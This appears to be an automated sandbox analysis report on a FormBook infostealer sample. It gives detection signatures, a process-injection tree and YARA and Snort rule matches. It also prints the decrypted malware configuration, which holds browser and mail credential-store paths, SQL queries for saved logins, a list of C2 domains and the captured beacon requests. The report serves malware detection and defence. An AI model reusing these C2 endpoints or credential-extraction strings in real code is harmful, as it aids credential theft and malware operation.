Loading ...

Play interactive tourEdit tour

Analysis Report YvGnm93rap.exe

Overview

General Information

Sample Name:YvGnm93rap.exe
Analysis ID:339311
MD5:16e1a5d26c0698ac48d63661264e0ba1
SHA1:5e61d05157c4aa1acfc6a89de619f6bbcad176f6
SHA256:e4e84d03d4cb709d737f9ee3e69b40d797e452d83faa35f0a06bb78a87ad0984
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • YvGnm93rap.exe (PID: 2396 cmdline: 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: 16E1A5D26C0698AC48D63661264E0BA1)
    • YvGnm93rap.exe (PID: 6196 cmdline: {path} MD5: 16E1A5D26C0698AC48D63661264E0BA1)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6564 cmdline: /c del 'C:\Users\user\Desktop\YvGnm93rap.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bbd0", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bc26", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9f116468", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715052", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122fe", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "fakecostasunglasses.com", "twinbrothers.pizza", "jizhoujsp.com", "qscrit.com", "hotelmanise.com", "fer-ua.online", "europserver-simcloud.systems", "redwap2.pro", "betwalkoffame.com", "latashalovemillionaire.com", "8million-lr.com", "tomatrader.com", "modaluxcutabovefitness.com", "shishijiazu.com", "cckytx.com", "reversehomeloansmiami.com", "imaginenationnetwork.com", "thecyclistshop.com", "jorgegiljewelry.com", "hlaprotiens.com", "biblecourt.com", "puzelhome.com", "musicbychristina.com", "iregentos.info", "ephwehemeral.com", "qubeeva.com", "healingwithkarlee.com", "giftasmile2day.com", "ondesign03.net", "argusproductionsus.com", "tootleshook.com", "sukien-freefire12.com", "windmaske.com", "futbolclubbarcelona.soccer", "veteransc60.com", "steambackpacktrade.info", "zingnation.com", "myfoodworldcup.com", "playitaintso.net", "crafteest.com", "deutschekorrosionsschutz.net", "streamcommunitty.com", "gatehess.com", "hechoenvegas.net", "4037a.com", "santanabeautycares.com", "100feetpics.com", "johnsroadantiques.com", "improve-climbing.com", "18shuwu.net", "amazon-support-recovery.com", "vibrarecovery.com", "deskdonors.info", "triagggroup.com", "probysweden.com", "helloinward.com", "vvardown.com", "kicksends.com", "alwayadopt.com", "modernappsllc.com", "itswooby.com", "med.vegas", "chadwestconsulting.com", "africanosworld.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.bodyfuelrtd.com/8rg4/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.YvGnm93rap.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.YvGnm93rap.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.YvGnm93rap.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158b9:$sqlite3step: 68 34 1C 7B E1
          • 0x159cc:$sqlite3step: 68 34 1C 7B E1
          • 0x158e8:$sqlite3text: 68 38 2A 90 C5
          • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
          • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
          2.2.YvGnm93rap.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            2.2.YvGnm93rap.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 2.2.YvGnm93rap.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79df", "KEY1_OFFSET 0x1bbd0", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1bc26", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9f116468", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715052", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122fe", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
            Multi AV Scanner detection for submitted fileShow sources
            Source: YvGnm93rap.exeVirustotal: Detection: 46%Perma Link
            Source: YvGnm93rap.exeReversingLabs: Detection: 26%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: YvGnm93rap.exeJoe Sandbox ML: detected
            Source: 2.2.YvGnm93rap.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: YvGnm93rap.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: YvGnm93rap.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: msiexec.pdb source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: msiexec.pdbGCTL source: YvGnm93rap.exe, 00000002.00000002.267148139.0000000001250000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: YvGnm93rap.exe, 00000002.00000003.226603868.0000000000BA0000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: YvGnm93rap.exe
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 4x nop then pop ebx
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49729 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49763 -> 34.102.136.180:80
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=A4ItsHP+WlrLG/knzE1FqdRUH2iuHEJ7BxsWyFaOnTa5UmbK6eGivqtSi2ljMDHkmrx5 HTTP/1.1Host: www.bodyfuelrtd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1Host: www.ondesign03.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1Host: www.crafteest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1Host: www.4037a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1Host: www.puzelhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
            Source: Joe Sandbox ViewASN Name: SUPERHOST-PL-ASPL SUPERHOST-PL-ASPL
            Source: Joe Sandbox ViewASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1Host: www.100feetpics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1Host: www.reversehomeloansmiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1Host: www.tomatrader.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1Host: www.futbolclubbarcelona.soccerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
